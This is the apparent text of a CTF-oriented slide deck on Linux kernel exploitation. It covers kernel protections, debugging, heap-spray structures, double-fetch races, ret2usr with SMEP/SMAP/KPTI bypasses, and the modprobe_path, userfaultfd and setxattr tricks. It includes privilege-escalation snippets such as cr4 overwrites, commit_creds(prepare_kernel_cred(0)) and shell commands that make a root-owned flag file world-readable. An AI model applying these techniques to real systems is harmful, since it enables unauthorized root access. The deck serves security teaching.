Kernel Exploitation

Kernel Exploitation yuawn yuawn _yuawn

About • yuawn • Current Leader of Balsn / DoubleSigma
• NTU nslab

Outline • Linux kernel Concepts & Debug • Kenrel Protection
• smep, smap, kaslr, kpti • Leak & useful structures • tty_struct, shm_ f i le_data, msg_msg ... • Kernel Common Vulnerability • double fetch • race condition • Exploitation & Tricks • ret2usr - bypass smep, smap, kpti • signal handler • modprobe_path • userfaultfd, setxattr, msgsnd & msgrcv, ... ROOT

Lab - kernel exploits demo • https://github.com/yuawn/kernel-exploitation • kernel module
• exploits

Linux Kernel

Kernel • Software • implemented syscalls • Communicate with hardware
• Intel CPU ring model: • ring 0, ring 1, ring 2, ring 3 • ring 0: kernel space • ring 3: user space kernel OS Applications hardware: CPU, Memory, Disk, Devices

Kernel - LKM • Loadable kernel module • Programs running
in kernel space • drivers • kernel extensions kernel OS Applications hardware: CPU, Memory, Disk, Devices kernel module

Kernel - functions • • • • • copy_from_user(void *to,
const void __user *from, unsigned long n) copy_to_user(void __user *to, const void *from, unsigned long n) printk() kmalloc() kfree()

Kernel Pwn • kernel exploitation • Privilege Escalation - 提權
• linux root account • user space to kernel space • ring 3 -> ring 0

Kernel Pwn • Modi f i ed kernel • Mobile:
Android, ARM TrustZone • IoT • Kernel Module • Original Linux Kernel • CVE Hypervisor ARM Trusted Firmware APPs Trusted APPs OS (kernel) Trusted OS

CTF kernel pwn

CTF Prepare - f i les • bzImage - kernel
• initramfs.cpio.gz - f i le system • run.sh - shell script for running qemu

CTF Prepare - running script • run.sh • How to
run with qemu • check kernel protections: • smep, smap, kaslr • #!/bin/bash qemu-system-x86_64 \ -kernel ./bzImage \ -initrd ./initramfs.cpio.gz \ -nographic \ -monitor none \ -cpu qemu64,+smep,+smap \ -append "console=ttyS0 kaslr panic=1" \ -no-reboot \ -m 256M https://github.com/torvalds/linux/blob/master/Documentation/admin-guide/kernel-parameters.txt

CTF Prepare - kernel • bzImage • https://github.com/torvalds/linux/blob/master/scripts/extract-vmlinux • $
./extract-vmlinux.sh bzImage > vmlinux • vmlinux: ELF 64-bit LSB executable, x86-64 • static analysis • Find kernel ROP gadgets: • $ ropper --nocolor -- f i le ./vmlinux > rop

CTF Prepare - f i le system • initramfs.cpio.gz •
$ gunzip initramfs.cpio.gz && cpio -idv < initramfs.cpio • Gain f i le system • /challenge.ko - kernel module • /init • / f l ag • -r-------- 1 root 0 / f l ag

CTF Prepare - init f i le • /init •
觀察題⽬初始化設置 • insmod challenge.ko • echo 1 > /proc/sys/kernel/kptr_restrict • 0 -> no restrictions • 1 -> User 要有 CAP_SYSLOG 權限 (root) • 2 -> 不管權限如何 %pK 通通換成 0 • echo 1 > /proc/sys/kernel/dmesg_restrict • 0 -> no restrictions • 1 -> User 要有 CAP_SYSLOG 權限 (root)

CTF Prepare - .ko • /challenge.ko • 題⽬ binary 主體
• 通常會實作成⼀隻 miscdeivce 或 driver，可以透過 open 來使⽤ ioctl 或是 f i le operations 和 kernel module 溝通與使⽤操作。 • /dev/challenge • /proc/challenge

CTF Prepare - exploit • 使⽤ C (或其他語⾔) 撰寫，編譯出 exploit
binary • 上傳到 remote server 的 qemu vm 中 • printf "" >> exp • echo "" | base64 -d >> exp • $ musl-gcc -static exp.c -o exp • 輕量 libc，縮⼩ exp binary ⼤⼩，減少上傳時間 • $ sudo apt install musl-tools • shell 執⾏ exploit

Kernel Debug

Debug • $ dmesg • printk() • $ cat /proc/kallsyms
• function symbol • f i nd kernel base: • $ cat /proc/kallsyms | grep _text | head -n 1 • $ cat /proc/modules • f i nd kernel module base: • $ cat /proc/modules | grep <module name> • $ cat /proc/slabinfo

Debug • 修改 init 檔案，獲得 root 權限，⽅便 debug • setsid
cttyhack setuidgid 1000 sh • setsid cttyhack setuidgid 0 sh • 打包回去給 qemu 跑： • $ f i nd . -print0 | cpio --null -ov --format=newc > rootfs.cpio 2>/dev/null

Debug • run.sh qemu-system-x86_64 • -s 開 gdb debug port
在預設 port 1234 • -S 停在整個 CPU 執⾏的⼀開始 • -append "nokaslr" 關掉 kaslr • gdb 連上去 • target remote localhost:1234 • add-symbol- f i le challenge.ko baseaddr • add-symbol- f i le vmlinux baseaddr

Kernel Protection

kernel protections • smep • smap • kaslr - kernel
ASLR • kpti

smep • Supervisor Mode Execution Protection • 在 ring 0
kernel mode 底下，不能執⾏ user space 的 code • 記錄在 cr4 register 中

smap • Supervisor Mode Access Protection • 和 smep 類似，在
ring 0 kernel mode 底下，不能存取 user space memory • 記錄在 cr4 register 中

kpti • kernel page-table isolation • cr3 register • page-table
entry • 效果類似 smep + smap • Meltdown, Spectre • $ dmesg | grep "Kernel/User page tables isolation: enabled"

Information leak in kernel

Leak • CVE • 1 day • 0 day •
Vulnerable implementation in kernel module • 概念和⼀般情形相同 • uninitialize • oob or arbitrary read write • race condition • ...

Leak • 如果有未清空未初始化等漏洞，則可以透過 copy_to_user() 將 address 寫回 user space，leak 出殘留內容。
• 如未對於請求的 kernel heap 清空或初始化，會希望在 user space (exploit binary) 中，做⼀些會在 kernel 中請求記憶體 (kernel heap) 的操作使得 kernel heap 上殘留 kernel, kernel stack, kernel heap 等 address，使得後續 kernel module 拿到的 heap chunk 上有這些資訊。 • 概念類似 heap exploitation，free 出 unsorted bin，使 heap 上出現 libc address。 • ⽬標找出類似這樣概念好⽤的 kernel structure 來分配。

useful structure for leak • ⽅便從 user space 中控制分配與釋放 •
size 合適，⽅便後續⾼機率拿到同⼀塊。 • heap spray • 視情況是否可以控制 kmalloc() 的 size • structure 中滿滿的 pointers • kernel text, heap, stack • vtable: function pointers

useful structure for leak • tty_struct (0x2e0, 02c0) base, heap
• shm_ f i le_data (0x20) base, heap • seq_operations (0x20) base • msg_msg (0x30〜0x1000) heap • subprocess_info (0x60) base, heap • ... • 任何發覺可使⽤的 structure • structure size 會因為 kernel version 變動 • https://ptr-yudai.hatenablog.com/entry/2020/03/16/165628

tty_struct • Leak: base, heap • Size: 0x2c0 • size
少⽤，好拿取到同⼀塊 • • ⽅便從 user land trigger • tty_operations • 類似 vtable，存了許多對於 tty 操作對應的 function pointer 如 open, write, close, ioctl ... • 如果可以 UAF 等，可以透過 overwrite struct tty_operations 指向可控區域，如修改 write operation pointer，對 tty 做 write(pfd, ,) 時，則可以控制 kernel rip int pfd = open("/dev/ptmx", O_RDWR|O_NOCTTY); struct tty_struct { int magic; struct kref kref; struct device *dev; struct tty_driver *driver; const struct tty_operations *ops; int index; /* Protects ldisc changes: Lock tty not pty */ struct ld_semaphore ldisc_sem; struct tty_ldisc *ldisc; ...

tty_operations struct tty_operations { struct tty_struct * (*lookup)(struct tty_driver *driver,
struct file *filp, int idx); int (*install)(struct tty_driver *driver, struct tty_struct *tty); void (*remove)(struct tty_driver *driver, struct tty_struct *tty); int (*open)(struct tty_struct * tty, struct file * filp); void (*close)(struct tty_struct * tty, struct file * filp); void (*shutdown)(struct tty_struct *tty); void (*cleanup)(struct tty_struct *tty); int (*write)(struct tty_struct * tty, const unsigned char *buf, int count); int (*put_char)(struct tty_struct *tty, unsigned char ch); void (*flush_chars)(struct tty_struct *tty); int (*write_room)(struct tty_struct *tty); int (*chars_in_buffer)(struct tty_struct *tty); int (*ioctl)(struct tty_struct *tty, unsigned int cmd, unsigned long arg); .... • include/linux/tty_driver.h

• heap spray tty_struct for( int i = 0 ;
i < 0x100 ; ++i ) pfd[i] = open( "/dev/ptmx" , O_RDWR | O_NOCTTY ); // tty_struct for( int i = 0 ; i < 0x100 ; ++i ) close(pfd[i]);

Kernel Common Vulnerability

double fetch • kernel space 與 user space 間 race
condition • kernel 存取兩次來⾃ user space 的 data，產⽣ race condition 的空隙

double fetch User Space Kernel Space Program kernel module

double fetch User Space Kernel Space Program kernel module syscall/ioctl

double fetch User Space Kernel Space Program kernel module 1st
fetch (check) syscall/ioctl

fetch (check) syscall/ioctl memory 0x401000: 0x30 copy_from_user()

fetch (check) syscall/ioctl memory 0x401000: 0x30 copy_from_user() 2nd fetch (use) check   0x30 < 0x100 True

fetch (check) memory 0x401000: 0x30 syscall/ioctl copy_from_user() check   0x30 < 0x100 True memory 0x401000: 0x30 copy_from_user() 2nd fetch (use)

fetch (check) syscall/ioctl memory 0x401000: 0x30 copy_from_user()

fetch (check) syscall/ioctl memory 0x401000: 0x30 copy_from_user() 2nd fetch (use) check   0x30 < 0x100 True

fetch (check) memory 0x401000: 0x1000 syscall/ioctl copy_from_user() check   0x30 < 0x100 True memory 0x401000: 0x1000 modify user data 2nd fetch (use)

fetch (check) 2nd fetch (use) syscall/ioctl copy_from_user() check   0x30 < 0x100 True memory 0x401000: 0x1000 modify user data copy_from_user() 0x1000 < 0x100 memory 0x401000: 0x1000

fetch (check) 2nd fetch (use) syscall/ioctl copy_from_user() check   0x30 < 0x100 True memory 0x401000: 0x1000 modify user data copy_from_user() 0x1000 < 0x100 False memory 0x401000: 0x1000

memory 0x401000: 0x1000 double fetch User Space Kernel Space Program
kernel module 1st fetch (check) 2nd fetch (use) syscall/ioctl copy_from_user() check   0x30 < 0x100 True memory 0x401000: 0x1000 modify user data copy_from_user() 0x1000 < 0x100 False Pwned ☠

double fetch • 正確姿勢 • ⼀次性 copy_from_user() • 先 copy
到 kernel 裡，再做後續使⽤

Kernel Exploitation

ret2user

ret2user • user mode 不能 access kernel space，kernel mode 可以
access user space • 在 kernel mode 執⾏時 return 到 user space，帶著 ring 0 特權執⾏ user code • control kernel rip • Status Switch • user space to kernel space • kernel space to user space • arch/x86/entry/entry_64.S

ret2user • Status Switch • kernel space to user space
• Restore GS value by swapgs instruction • iret instruction • iretq • Stored register value at stack user cs iretq user space rip user r f l ags user sp user ss kernel rsp swapgs ; ret

ret2user • Status Switch • kernel space to user space
• Save status size_t user_cs, user_ss, user_rflags, user_sp; void save_status() { __asm__("mov user_cs, cs;" "mov user_ss, ss;" "mov user_sp, rsp;" "pushf;" "pop user_rflags;" ); puts("[*]status has been saved."); }

ret2user • Constraints • smep • smap • kpti

Bypass smep • ROP • 類似 bypass NX 的概念 •
將 kernel stack rsp 搬到 user space 上做 ROP • 直接在 kernel 中 ROP

Bypass smap • ROP dead • Disallows explicit supervisor-mode data
accesses to user-mode pages • how do copy_from_user() and copy_to_user() work?

Bypass smap • arch/x86/lib/copy_user_64.S • instruction • stac • clac
SYM_FUNC_START(copy_user_generic_unrolled) ASM_STAC cmpl $8,%edx jb 20f /* less then 8 bytes, go to byte copy loop */ ALIGN_DESTINATION movl %edx,%ecx andl $63,%edx shrl $6,%ecx jz .L_copy_short_string ... movl %edx,%ecx 21: movb (%rsi),%al 22: movb %al,(%rdi) incq %rsi incq %rdi decl %ecx jnz 21b 23: xor %eax,%eax ASM_CLAC ret

Bypass smap • arch/x86/lib/copy_user_64.S • instruction • stac - allow
• clac - disallow SYM_FUNC_START(copy_user_generic_unrolled) ASM_STAC cmpl $8,%edx jb 20f /* less then 8 bytes, go to byte copy loop */ ALIGN_DESTINATION movl %edx,%ecx andl $63,%edx shrl $6,%ecx jz .L_copy_short_string ... movl %edx,%ecx 21: movb (%rsi),%al 22: movb %al,(%rdi) incq %rsi incq %rdi decl %ecx jnz 21b 23: xor %eax,%eax ASM_CLAC ret

Bypass smap • instruction • stac - allow • clac
- disallow • Only allowed in kernel mode, they fault in user-space.

Bypass smap • Overwrite cr4 register • 在 kernel 中先做些事
(ROP, ...)，把 cr4 register 寫掉 -> 0x6f0 • 關掉 smep, smap 再 return 回 user space 執⾏或 ROP

ret2user • Constraints • bypass smep • 將 kernel stack
rsp 搬到 user space 上做 ROP直接在 kernel 中 ROP • bypass smap • 在 kernel 中先做些事 (ROP, ...)，把 cr4 register 寫掉 -> 0x6f0 • 關掉 smep, smap 再 return 回 user space 執⾏或 ROP • kpti • f i x cr3 register - page table • swapgs_restore_regs_and_return_to_usermode()

privilege escalation • ROP • • ret2user -> system("/bin/sh") •
spawn a root shell! commit_creds(prepare_kernel_cred(0))

privilege escalation • ROP • • ret2user -> system("/bin/sh") •
spawn a root shell! commit_creds(prepare_kernel_cred(0)) ROOT ☠

Kernel Exploitation 萬解

modprobe_path

modprobe_path • kernel global variable • default path: /sbin/modprobe •
$ cat /proc/sys/kernel/modprobe • 執⾏⼀個 kernel 認不得的執⾏檔格式時，kernel 會帶 root 權限執⾏這個 path 所定義的檔案。

modprobe_path • sys_execve • do_execve() • do_execveat_common() • bprm_execve() •
exec_binprm() • search_binary_handler() • request_module() • call_modprobe() • call_usermodehelper_exec() static int search_binary_handler(struct linux_binprm *bprm) { ... if (need_retry) { if (printable(bprm->buf[0]) && printable(bprm->buf[1]) && printable(bprm->buf[2]) && printable(bprm->buf[3])) return retval; if (request_module("binfmt-%04x", *(ushort *)(bprm->buf + 2)) < 0) return retval; need_retry = false; goto retry; } ...

modprobe_path • exploitation • overwrite modprobe_path 成⾃⼰寫得 shell script，/tmp/x •
$ echo -ne '#!/bin/sh\n/bin/chmod 777 /flag' > /tmp/x • 執⾏格式壞掉的執⾏檔 • $ echo -ne '\\xff\\xff\\xff\\xff' > /tmp/fake • $ chmod +x /tmp/fake && /tmp/fake • kernel 以 root 權限執⾏ /tmp/x • cat / f l ag

modprobe_path • exploitation • overwrite modprobe_path 成⾃⼰寫得 shell script，/tmp/x •
$ echo -ne '#!/bin/sh\n/bin/chmod 777 /flag' > /tmp/x • 執⾏格式壞掉的執⾏檔 • $ echo -ne '\\xff\\xff\\xff\\xff' > /tmp/fake • $ chmod +x /tmp/fake && /tmp/fake • kernel 以 root 權限執⾏ /tmp/x • cat / f l ag ROOT ☠

modprobe_path • android root • http://powerofcommunity.net/poc2016/x82.pdf • powero f f
_cmd

setxattr & userfaultfd

userfaultfd • syscall - 323 • 註冊 userfault 記憶體區域，並⾃⾏實作 page
fault handler • ⾃⾏控制 page fault 處理⾏為 • 當 kernel 中進⾏ copy_from_user() 或 copy_to_user() 時，access user memory 會觸發 page fault，此時可以在 page fault handler 中處理⾏為。

userfaultfd • 應⽤在 exploitation 上的效果 • race condition friendly •
如在 page fault handler 中 sleep，即可卡住 kernel 中的執⾏流程 • 先執⾏其他操作才完成對 fault 處理，控制執⾏流程先後順序 • 使其穩定發⽣能觸發 race condition 的 scenario，不需撞機率

setxattr

setxattr • syscall - 188 • 可以在 user space 直接使⽤
setxattr 來接 kvmalloc() 請求 1 ~ 65536 (0x10000)範圍的⼤⼩，並且將 user land data copy 上去。 • setxattr + userfualtfd 連技 • 常搭配 userfaultfd 串招，來卡住中間執⾏ copy_from_user()，⽤可以⾃⾏決定處理好 page fault 的時機來使 setxattr 繼續執⾏，間接控制 kfree() 時機，可以⽤來⽅便串 UAF。

• linux-5.9.12/fs/xattr.c#510 setxattr static long setxattr(struct dentry *d, const char
__user *name, const void __user *value, size_t size, int flags) { int error; void *kvalue = NULL; char kname[XATTR_NAME_MAX + 1]; if (flags & ~(XATTR_CREATE|XATTR_REPLACE)) return -EINVAL; error = strncpy_from_user(kname, name, sizeof(kname)); if (error == 0 || error == sizeof(kname)) error = -ERANGE; if (error < 0) return error; if (size) { if (size > XATTR_SIZE_MAX) return -E2BIG; kvalue = kvmalloc(size, GFP_KERNEL); if (!kvalue) return -ENOMEM; if (copy_from_user(kvalue, value, size)) { error = -EFAULT; goto out; } if ((strcmp(kname, XATTR_NAME_POSIX_ACL_ACCESS) == 0) || (strcmp(kname, XATTR_NAME_POSIX_ACL_DEFAULT) == 0)) posix_acl_fix_xattr_from_user(kvalue, size); else if (strcmp(kname, XATTR_NAME_CAPS) == 0) { error = cap_convert_nscap(d, &kvalue, size); if (error < 0) goto out; size = error; } } error = vfs_setxattr(d, kname, kvalue, size, flags); out: kvfree(kvalue); return error; }

setxattr + userfaultfd • 將 userfaultfd 結合⽤來卡住 setxattr 內的 copy_from_user()，使其不會
直接⾺上 kfree() • 當需要 kfree() chunk 時，於⾃⾏實作的 userfaultfd page felt handler 中 copy mmap 出來準備好的 page 完成 page fault 處理，即可使 setxattr 繼續執⾏完成 kfree() • 解決 setxattr 可以任意控制 kmalloc() 時機與 size, content，卻無法控制 kfree() 時機的缺點。

setxattr + userfaultfd • 串招後，從 user land 可以直接： • 任意時機調⽤
kmalloc() • 滿⾜絕⼤多數需求的 size range: 1 ~ 65536(0x10000) • 完全從 user land 控制 chunk 內容 • 搭配 userfaultfd，任意時機選擇 kfree()

setxattr + userfaultfd • SECCON 2020 - Kstack • https://github.com/Brie
f l yX/ctf-pwns/tree/master/kernel/kstack

msg_msg • msgget() • msgsnd() • msgrcv() • https://duasynt.com/blog/linux-kernel-heap-spray

msg_msg • • • kmalloc(size+0x30) • 將 msgbuf 內容 copy
⾄ chunk + 0x30 處，前 0x30 為其 header • • kfree int qid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT) msgsnd(qid, &msgbuf, real_size - 0x30, 0) msgrcv(qid, &msgbuf, real_size - 0x30, 1, 0)

msg_msg • Pros • ⽅便從 user land 控制 kmalloc() kfree()
• code 好寫 • 比 setxattr + userfaultfd 更好控制 kfree() 時機，即使⽤ msgrcv() 即可 • Cons • kmalloc 出來的 chunk 前 0x30，不好控

Thanks! yuawn _yuawn

Kernel Exploitation

Kernel Exploitation

More Decks by yuawn

Other Decks in Research

Featured

Transcript